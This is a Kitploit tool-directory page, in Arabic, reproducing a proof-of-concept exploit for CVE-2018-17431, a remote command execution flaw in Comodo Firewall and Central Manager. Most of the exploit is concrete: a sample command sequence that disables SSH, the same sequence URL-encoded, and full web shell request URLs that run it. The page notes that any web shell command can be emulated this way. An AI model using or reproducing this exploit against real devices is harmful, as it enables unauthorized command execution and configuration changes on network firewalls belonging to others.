Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-17431-Comodo — Comodo | Kitploit
أدوات/GitHubGitHub/sanan2004/cve-2018-17431-comodo
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubsanan2004/cve-2018-17431-comodo

CVE-2018-17431-Comodo

Comodo

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-17431-PoC

إثبات المفهوم لـ CVE-2018-17431

عنوان الاستغلال: Comodo Firewall & Central Manager (UTM) جميع الإصدارات قبل 2.7.0 و 1.5.0 - تنفيذ أوامر عن بُعد (قائم على Web Shell)

مؤلف الاستغلال: Milad Fadavvi

الصفحة الرئيسية للمورد: https://www.comodo.com/

رابط البرنامج: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

الإصدار: قبل 2.7.0 و 1.5.0

تنزيل الأداة

تم الاختبار على: Windows:firefox/chrome - Kali:firefox

تاريخ الاكتشاف: 2018-08-15 (تم الإبلاغ في نفس اليوم)

تأكيد وجود الثغرة: 2018-09-22 (معرف التذكرة: XWR-503-79437)

الاستغلال:

  1. محاكاة WebShell:

    root@kitploit:~
     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. الترميز

    root@kitploit:~
     make above sequense encode with URL ECODING
     (I used burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. التشغيل

    root@kitploit:~
     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (مفتاح enter إضافي لتشغيل الأمر)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

ستظهر صفحة تحتوي على رسالة "Configuration has been altered" وسيتم تغيير التكوين!

بهذه التقنية، يمكننا محاكاة جميع أوامر WebShell.